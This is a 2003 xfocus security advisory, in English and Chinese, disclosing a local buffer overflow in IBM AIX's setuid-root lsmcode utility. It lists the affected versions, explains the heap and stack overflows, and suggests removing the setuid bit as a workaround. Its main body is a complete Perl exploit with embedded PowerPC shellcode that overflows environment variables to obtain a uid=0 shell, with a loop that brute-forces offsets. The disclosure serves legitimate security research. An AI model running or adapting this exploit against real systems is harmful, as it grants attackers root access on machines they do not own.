xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加文章 English Version

IBM AIX lsmcode存在本地缓冲区溢出问题


创建时间:2003-06-20 更新时间:2003-06-20
文章属性:整理
文章提交:watercloud (watercloud_at_xfocus.org)

IBM AIX LSMCODE Environment Variable Local Buffer Overflow Vulnerability (Vulnerabilities)
URL: http://www.securityfocus.com/bid/7871
Last Updated: 2003-06-11

Bugtraq ID: 7871
Class: Boundary Condition Error
CVE: CVE-MAP-NOMATCH

Published Jun 11, 2003
Vulnerable :
  IBM AIX 4.3
  IBM AIX 4.3.1
  IBM AIX 4.3.2
  IBM AIX 4.3.3
  IBM AIX 5.1

Insufficient bounds checking in the lsmcode utility will allow locally based
attackers to cause memory to be corrupted with attacker-supplied data. As a
result, it is possible to exploit this condition to execute arbitrary
attacker-supplied instructions with elevated privileges.

Exploit :
http://www.securityfocus.com/data/vulnerabilities/exploits/x_lsmcode_aix4x.pl


Currently we are not aware of any vendor-supplied patches for this issue.

Credit:

     Discovery of this vulnerability credited to watercloud@xfocus.org.


==============================================


中文:
IBM的AIX操作系统lsmcode命令存在本地缓冲区溢出漏洞,
该程序带了s位,且为root所有,本地用户可以利用该漏洞
获得root权限。

受影响的AIX版本包括:Aix4.3.1、Aix4.3.2、Aix4.3.3、Aix5.1。

目前厂商还没有相应补丁。

该漏洞为XFOCUS小组发现。

==============================================

XFOCUS补充信息如下:

Bugtraq上对该漏洞描述不全面,该命令对多个命令行参数和环境变量没有进行边界长度检测,
而非只是环境变量方面有问题,其中命令行上的溢出为堆溢出,环境变量上的为栈溢出。


----------------------------
XFOCUS发布的利用如下:

#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested  : on Aix4.3.3.Mybe can work on other versions.
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-6-1
# Announce: use as your owner risk!

$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;

$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-6-1 ].\n\n";

$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();

$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="\x2f\xf2\x2a\x2f"x300;
$ret = system $CMD ,"-d","a";

for($i=0;$i<4 && $ret;$i++){
  for($j=0;$j<4 && $ret;$j++) {
    $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
    $ENV{DIAGNOSTICS}="A"x $j ."\x2f\xf2\x2a\x2f"x300;
    $ret = system $CMD ,"-d","a";
  }
}

#sub
sub getshell($XID,$GID) {
  my $SHELL,($XID,$GID)=@_;
  $SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
  $SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
  $SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
  $SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
  $SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
  $SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
  $SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
  return $SHELL;
}
#EOF

该程序适当修改后可以在Aix5.1上取得root权限。

-----------------------------------
用户临时解决方法:

  临时去掉该程序的s位。